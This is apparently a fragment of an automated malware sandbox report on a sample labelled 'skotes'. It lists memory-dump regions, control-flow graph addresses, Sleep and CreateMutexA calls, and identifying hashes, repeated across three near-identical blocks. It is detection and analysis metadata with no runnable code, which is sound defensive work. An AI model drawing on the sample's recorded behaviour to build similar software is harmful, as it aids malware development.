                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: ea3c1b70ba86fdbc9a752ce754555bd61030749c1d80974a4ac4d318b3894e77
                                                                                                                                                                                                        • Instruction ID: b20d0387beefe499a18127a95eca0e4a4b2b397420baf179cd0c43ff63e39f0d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea3c1b70ba86fdbc9a752ce754555bd61030749c1d80974a4ac4d318b3894e77
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62313931B052099BEB08DB68DCC9F6DBB66ABC6314F24861DE014973D5C73999808753

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 124 9ca418-9ca438 128 9ca43a-9ca446 124->128 129 9ca466-9ca482 124->129 130 9ca45c-9ca463 call 9dd663 128->130 131 9ca448-9ca456 128->131 132 9ca484-9ca490 129->132 133 9ca4b0-9ca4cf 129->133 130->129 131->130 134 9ca93f-9ca994 call 9f6c6a * 4 Sleep CreateMutexA 131->134 136 9ca4a6-9ca4ad call 9dd663 132->136 137 9ca492-9ca4a0 132->137 138 9ca4fd-9ca916 call 9d80c0 133->138 139 9ca4d1-9ca4dd 133->139 160 9ca996-9ca998 134->160 161 9ca9a7-9ca9a8 134->161 136->133 137->134 137->136 144 9ca4df-9ca4ed 139->144 145 9ca4f3-9ca4fa call 9dd663 139->145 144->134 144->145 145->138 160->161 162 9ca99a-9ca9a5 160->162 162->161
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: f92235b8b724c1b359a2cd76c139674ebd97795157fc06d7daf28aeecbd72ee1
                                                                                                                                                                                                        • Instruction ID: f16af29cac5475c81de91898622ef2fb2250671172ae7ddabc3b80c94905cafd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f92235b8b724c1b359a2cd76c139674ebd97795157fc06d7daf28aeecbd72ee1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20312931B012099BEB089B78DCCDFADBA65EBD5318F20821CE455973E5C77989808757

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 164 9ca54d-9ca56d 168 9ca56f-9ca57b 164->168 169 9ca59b-9ca5b7 164->169 170 9ca57d-9ca58b 168->170 171 9ca591-9ca598 call 9dd663 168->171 172 9ca5b9-9ca5c5 169->172 173 9ca5e5-9ca604 169->173 170->171 176 9ca944-9ca994 call 9f6c6a * 3 Sleep CreateMutexA 170->176 171->169 178 9ca5db-9ca5e2 call 9dd663 172->178 179 9ca5c7-9ca5d5 172->179 174 9ca606-9ca612 173->174 175 9ca632-9ca916 call 9d80c0 173->175 180 9ca628-9ca62f call 9dd663 174->180 181 9ca614-9ca622 174->181 198 9ca996-9ca998 176->198 199 9ca9a7-9ca9a8 176->199 178->173 179->176 179->178 180->175 181->176 181->180 198->199 200 9ca99a-9ca9a5 198->200 200->199
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: c4b258281c4ff948adf44f00626cac17e7687f7133b50ca799e655638e70a4a9
                                                                                                                                                                                                        • Instruction ID: 1a5f51b08acd5240face8c95723f3e1ef8dae3d2c5bcb8939ecc6d5b19cbdf57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4b258281c4ff948adf44f00626cac17e7687f7133b50ca799e655638e70a4a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3312731F012498BEB08DB78D8C9F6DBB66EBC5328F24861CE4549B3D5C73989818767

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 202 9ca682-9ca6a2 206 9ca6a4-9ca6b0 202->206 207 9ca6d0-9ca6ec 202->207 208 9ca6c6-9ca6cd call 9dd663 206->208 209 9ca6b2-9ca6c0 206->209 210 9ca6ee-9ca6fa 207->210 211 9ca71a-9ca739 207->211 208->207 209->208 212 9ca949-9ca994 call 9f6c6a * 2 Sleep CreateMutexA 209->212 214 9ca6fc-9ca70a 210->214 215 9ca710-9ca717 call 9dd663 210->215 216 9ca73b-9ca747 211->216 217 9ca767-9ca916 call 9d80c0 211->217 234 9ca996-9ca998 212->234 235 9ca9a7-9ca9a8 212->235 214->212 214->215 215->211 218 9ca75d-9ca764 call 9dd663 216->218 219 9ca749-9ca757 216->219 218->217 219->212 219->218 234->235 236 9ca99a-9ca9a5 234->236 236->235
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
